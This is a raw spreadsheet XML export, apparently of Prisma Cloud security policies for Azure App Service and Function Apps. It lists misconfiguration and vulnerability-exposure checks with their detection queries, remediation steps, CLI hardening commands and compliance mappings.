      <c r="Z2177" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'kind starts with app and properties.httpsOnly equals false'
{"category":"Networking","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2177" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2177" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2177" t="inlineStr">
        <is>
          <t>PC-AZR-APP-406-CKV_AZURE_14</t>
        </is>
      </c>
      <c r="AD2177" t="b">
        <v>1</v>
      </c>
      <c r="AE2177" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2177" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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7" t="inlineStr">
        <is>
          <t>7cc2b77b-ad71-4a84-8cab-66b2b04eea5f</t>
        </is>
      </c>
      <c r="AI2177" t="inlineStr">
        <is>
          <t>c6c62207-dbf7-45a1-b809-e1c896eb28fb</t>
        </is>
      </c>
      <c r="AJ2177" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2177" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2178">
      <c r="A2178" t="inlineStr"/>
      <c r="B2178" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2178" s="2" t="inlineStr"/>
      <c r="D2178" t="inlineStr"/>
      <c r="E2178" t="inlineStr"/>
      <c r="F2178" t="inlineStr"/>
      <c r="G2178" t="b">
        <v>1</v>
      </c>
      <c r="H21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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2178" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2178" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and vulnerable Azure Function</t>
        </is>
      </c>
      <c r="L2178" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2178" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2178" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2178" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2178" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2178" t="inlineStr"/>
      <c r="R2178" t="inlineStr"/>
      <c r="S2178" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2178" t="b">
        <v>0</v>
      </c>
      <c r="U2178" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2178" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2178" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function Apps which are publicly exposed and have critical or high vulnerabilities.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected Functions, enabling them to perform malicious actions. The public exposure of these vulnerable Function Apps makes them an easy target for attacks.
Immediate attention is required to remediate the critical and high vulnerabilities, and restrict public exposure reported for the Azure Function App as soon as possible.</t>
        </is>
      </c>
      <c r="X2178"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178" t="inlineStr"/>
      <c r="Z2178" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2178" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2178" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2178" t="inlineStr"/>
      <c r="AD2178" t="b">
        <v>1</v>
      </c>
      <c r="AE2178" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2178" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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8" t="inlineStr">
        <is>
          <t>d089a57a-bc16-4951-a797-96adfd7d0555</t>
        </is>
      </c>
      <c r="AI2178" t="inlineStr">
        <is>
          <t>6be2d3db-c0a2-48c1-a8cb-0ddeacb97027</t>
        </is>
      </c>
      <c r="AJ2178" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2178" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2179">
      <c r="A2179" t="inlineStr">
        <is>
          <t>HIPAA, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, TX-RAMP Level 2, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Telecommunications Security Act - TSA, ITSG-33, Insurance Regulatory And Development Authority Of India, SOC 2, SOC 2, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, ISO/IEC 27001:2022, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B2179" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2179" s="2" t="inlineStr"/>
      <c r="D2179" t="inlineStr"/>
      <c r="E2179" t="inlineStr"/>
      <c r="F2179" t="inlineStr"/>
      <c r="G2179" t="b">
        <v>0</v>
      </c>
      <c r="H21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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2179" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2179" t="inlineStr">
        <is>
          <t>Azure Function app configured with public network access</t>
        </is>
      </c>
      <c r="L2179" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2179" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2179" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2179" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2179" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2179" t="inlineStr">
        <is>
          <t>164.312(e)</t>
        </is>
      </c>
      <c r="R2179" t="inlineStr">
        <is>
          <t>164.312(e)(2)(i)</t>
        </is>
      </c>
      <c r="S2179" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2179" t="b">
        <v>0</v>
      </c>
      <c r="U2179" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2179" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2179" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function apps that are configured with public network access. Publicly accessible web apps could allow malicious actors to remotely exploit any vulnerabilities and could. It is recommended to configure the Function apps with private endpoints so that the functions hosted are accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2179" t="inlineStr">
        <is>
          <t>To restrict App Service access, follow the below URL:
https://learn.microsoft.com/en-us/azure/app-service/app-service-ip-restrictions 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/azr-networking-63
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/azr-networking-63</t>
        </is>
      </c>
      <c r="Y2179" t="inlineStr"/>
      <c r="Z2179" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'kind contains functionapp and kind does not contain workflowapp and kind does not equal app and properties.state equal ignore case running and ((properties.publicNetworkAccess exists and properties.publicNetworkAccess equal ignore case Enabled) or (properties.publicNetworkAccess does not exist)) and config.ipSecurityRestrictions[?any((action equals Allow and ipAddress equals Any) or (action equals Allow and ipAddress equals 0.0.0.0/0))] exists'
{"category":"Networking","resourceTypes":["azurerm_linux_function_app","azurerm_linux_function_app_slot","azurerm_windows_function_app","azurerm_windows_function_app_slot"]}</t>
        </is>
      </c>
      <c r="AA2179" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2179" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:47</t>
        </is>
      </c>
      <c r="AC2179" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1040-CKV_AZURE_221</t>
        </is>
      </c>
      <c r="AD2179" t="b">
        <v>1</v>
      </c>
      <c r="AE2179" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2179" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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79" t="inlineStr">
        <is>
          <t>1f120b65-1350-4f7c-aadb-e9d8b6a52910</t>
        </is>
      </c>
      <c r="AI2179" t="inlineStr">
        <is>
          <t>6106ed75-4236-4183-961f-1a15bc403af7</t>
        </is>
      </c>
      <c r="AJ2179" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2179" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2180">
      <c r="A2180" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, CRI Profile v2.0, NIST CSF v2.0, Insurance Regulatory And Development Authority Of India, NIST 800-53 Rev 5, FFIEC, NIST SP 800-171 Revision 3, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v7.1, CRI Profile v1.2.1, Copy of CIS Controls v8, ISO 27002:2022, ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v1.2.1, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, kfirdaus AWS Account-CS, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2180" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2180" s="2" t="inlineStr"/>
      <c r="D2180" t="inlineStr"/>
      <c r="E2180" t="inlineStr"/>
      <c r="F2180" t="inlineStr"/>
      <c r="G2180" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2180" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2180" t="inlineStr">
        <is>
          <t>Azure Function App doesn't use HTTP 2.0</t>
        </is>
      </c>
      <c r="L2180" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2180" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2180" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2180" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2180" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2180" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2180" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2180" t="inlineStr"/>
      <c r="T2180" t="b">
        <v>1</v>
      </c>
      <c r="U2180" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2180" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2180" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function App which doesn't use HTTP 2.0. HTTP 2.0 has additional performance improvements on the head-of-line blocking problem of old HTTP version, header compression, and prioritisation of requests. HTTP 2.0 no longer supports HTTP 1.1's chunked transfer encoding mechanism, as it provides its own, more efficient, mechanisms for data streaming.</t>
        </is>
      </c>
      <c r="X2180" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under Setting section, Click on 'Configuration'
5. Under 'General Settings' tab, In 'Platform settings', Set 'HTTP version' to '2.0'
6. Click on 'Save'
If Function App Hosted in Linux using Consumption (Serverless) Plan follow below steps
Azure CLI Command - \"az functionapp config set --http20-enable true --name MyFunctionApp --resource-group MyResourceGroup\" 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app</t>
        </is>
      </c>
      <c r="Y2180" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/config/Write' permission. Successful execution sets HTTP version to 2.0,
which has additional performance improvements on the head-of-line blocking problem of old HTTP version,
header compression,
and prioritization of requests.",
'impact': 'Sets latest HTTP version in Azure Function App',
'cliScriptTemplate': 'az functionapp config set --resource-group $resourceGroup --name $resourceName --http20-enabled true'</t>
        </is>
      </c>
      <c r="Z2180" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case "Running" AND kind contains "functionapp" AND kind does not contain "workflowapp" AND kind does not equal "app" AND config.http20Enabled is false
{"category":"General","resourceTypes":["azurerm_function_app"]}</t>
        </is>
      </c>
      <c r="AA2180" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2180" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2180" t="inlineStr">
        <is>
          <t>PC-AZR-APP-676-CKV_AZURE_67</t>
        </is>
      </c>
      <c r="AD2180" t="b">
        <v>1</v>
      </c>
      <c r="AE2180" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2180" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>6865e87f-5045-4319-bc32-b659bde8e3a2</t>
        </is>
      </c>
      <c r="AI2180" t="inlineStr">
        <is>
          <t>3ac6e13f-bee1-48cc-b1a9-33056c1c6654</t>
        </is>
      </c>
      <c r="AJ2180" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2180" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2181">
      <c r="A2181" t="inlineStr">
        <is>
          <t>HIPAA, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, TX-RAMP Level 2, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, ITSG-33, Insurance Regulatory And Development Authority Of India, SOC 2, SOC 2, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, ISO/IEC 27001:2022, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B2181" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2181" s="2" t="inlineStr"/>
      <c r="D2181" t="inlineStr"/>
      <c r="E2181" t="inlineStr"/>
      <c r="F2181" t="inlineStr"/>
      <c r="G2181" t="b">
        <v>1</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2181" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2181" t="inlineStr">
        <is>
          <t>Azure App Service web apps with public network access</t>
        </is>
      </c>
      <c r="L2181" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2181" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2181" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2181" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2181" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2181" t="inlineStr">
        <is>
          <t>164.312(e)</t>
        </is>
      </c>
      <c r="R2181" t="inlineStr">
        <is>
          <t>164.312(e)(2)(i)</t>
        </is>
      </c>
      <c r="S2181" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2181" t="b">
        <v>0</v>
      </c>
      <c r="U2181" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2181" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2181" t="inlineStr">
        <is>
          <t>This policy identifies Azure App Service web apps that are configured with public network access. Publicly accessible web apps could allow malicious actors to remotely exploit if any vulnerabilities and could. It is recommended to configure the App Service web apps with private endpoints so that the web apps hosted are accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2181" t="inlineStr">
        <is>
          <t>To restrict App Service network access, follow below URL:
https://learn.microsoft.com/en-us/azure/app-service/app-service-ip-restrictions 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/azr-networking-63
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/azr-networking-63</t>
        </is>
      </c>
      <c r="Y2181" t="inlineStr"/>
      <c r="Z2181" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'kind starts with app and properties.state equal ignore case running and properties.publicNetworkAccess exists and properties.publicNetworkAccess equal ignore case Enabled and config.ipSecurityRestrictions[?any(action equals Allow and ipAddress equals Any)] exists'
{"category":"Networking","resourceTypes":["azurerm_linux_web_app","azurerm_windows_web_app"]}</t>
        </is>
      </c>
      <c r="AA2181" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2181" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2181" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1039-CKV_AZURE_222</t>
        </is>
      </c>
      <c r="AD2181" t="b">
        <v>1</v>
      </c>
      <c r="AE2181" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2181" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>9974704e-9864-4c0f-b6b8-7781bbb91d7c</t>
        </is>
      </c>
      <c r="AI2181" t="inlineStr">
        <is>
          <t>6db58a3a-760a-4cf6-bb3e-b807f6e41bfc</t>
        </is>
      </c>
      <c r="AJ2181" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2181" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2182">
      <c r="A2182" t="inlineStr"/>
      <c r="B2182" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2182" s="2" t="inlineStr"/>
      <c r="D2182" t="inlineStr"/>
      <c r="E2182" t="inlineStr"/>
      <c r="F2182" t="inlineStr"/>
      <c r="G2182" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2182" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2182" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) risk due to a publicly exposed Azure Function with Spring4Shell vulnerability</t>
        </is>
      </c>
      <c r="L2182" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2182" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2182" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2182" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2182" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2182" t="inlineStr"/>
      <c r="R2182" t="inlineStr"/>
      <c r="S2182" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2182" t="b">
        <v>0</v>
      </c>
      <c r="U2182" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2182" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2182" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions that have Spring4Shell vulnerabilities and are publicly exposed. 
Spring4Shell vulnerability is very critical and can compromise the confidentiality, integrity, and availability of data managed by a vulnerable application. The fact that the Azure function is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Spring4Shell vulnerabilities [CVE-2022-22965 and CVE-2022-22963] and public exposure reported for the Azure function as soon as possible.</t>
        </is>
      </c>
      <c r="X2182"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182" t="inlineStr"/>
      <c r="Z2182" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA2182" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2182" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:25</t>
        </is>
      </c>
      <c r="AC2182" t="inlineStr"/>
      <c r="AD2182" t="b">
        <v>1</v>
      </c>
      <c r="AE2182" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2182" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>a08aa156-9a2a-494a-965c-97b460587800</t>
        </is>
      </c>
      <c r="AI2182" t="inlineStr">
        <is>
          <t>4b56cf77-2350-4f2b-ae79-21b9c31e1290</t>
        </is>
      </c>
      <c r="AJ2182" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2182" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2183">
      <c r="A2183" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27001:2022, CSA CCM v.4.0.6, GDPR, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.6, ISO 27002:2022, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, Telecommunications Security Act - TSA, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, NIST 800-53 Rev 5, CSA CCM v.4.0.6, ISO 27002:2022, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, NIST SP 800-171 Revision 3, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, DORA, TX-RAMP Level 2, CSA CCM v4.0.12, kfirdaus AWS Account-CS, FFIEC, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022</t>
        </is>
      </c>
      <c r="B2183" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2183" s="2" t="inlineStr"/>
      <c r="D2183" t="n">
        <v>0</v>
      </c>
      <c r="E2183" t="n">
        <v>8</v>
      </c>
      <c r="F2183" t="n">
        <v>0</v>
      </c>
      <c r="G2183" t="b">
        <v>1</v>
      </c>
      <c r="H21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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2183" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2183" t="inlineStr">
        <is>
          <t>Azure Function App doesn't redirect HTTP to HTTPS</t>
        </is>
      </c>
      <c r="L2183" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2183" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2183" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2183" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2183" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2183" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2183" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2183" t="inlineStr"/>
      <c r="T2183" t="b">
        <v>1</v>
      </c>
      <c r="U2183" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2183" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2183" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function App which doesn't redirect HTTP to HTTPS. Azure Function App can be accessed by anyone using non-secure HTTP links by default. Non-secure HTTP requests can be restricted and all HTTP requests redirected to the secure HTTPS port. It is recommended to enforce HTTPS-only traffic.</t>
        </is>
      </c>
      <c r="X2183" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under Setting section, Click on 'TLS/SSL settings'
5. In 'Protocol Settings', Set 'HTTPS Only' to 'On' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-function-apps-is-only-accessible-over-https</t>
        </is>
      </c>
      <c r="Y2183" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/Write' permission. Successful execution set on HTTPS-only feature,
by which non-secure HTTP requests can be restricted and all HTTP requests will be redirected to the secure HTTPS port.",
'impact': 'Redirects all HTTP traffic to HTTPS in Azure Function App',
'cliScriptTemplate': 'az functionapp update --resource-group $resourceGroup --name $resourceName --set httpsOnly=true'</t>
        </is>
      </c>
      <c r="Z2183" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case "Running" AND kind contains "functionapp" AND kind does not contain "workflowapp" AND kind does not equal "app" AND properties.httpsOnly is false
{"category":"Networking","resourceTypes":["azurerm_function_app"]}</t>
        </is>
      </c>
      <c r="AA2183" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2183" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2183" t="inlineStr">
        <is>
          <t>PC-AZR-APP-677-CKV_AZURE_70</t>
        </is>
      </c>
      <c r="AD2183" t="b">
        <v>1</v>
      </c>
      <c r="AE2183" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2183" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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3" t="inlineStr">
        <is>
          <t>46d8388d-72e4-413c-9a44-3670df42cfea</t>
        </is>
      </c>
      <c r="AI2183" t="inlineStr">
        <is>
          <t>82d945cb-49c0-4163-89ef-7ac3c194d4cb</t>
        </is>
      </c>
      <c r="AJ2183" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2183" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2184">
      <c r="A2184" t="inlineStr"/>
      <c r="B2184" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2184" s="2" t="inlineStr"/>
      <c r="D2184" t="inlineStr"/>
      <c r="E2184" t="inlineStr"/>
      <c r="F2184" t="inlineStr"/>
      <c r="G2184" t="b">
        <v>1</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2184" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2184" t="inlineStr">
        <is>
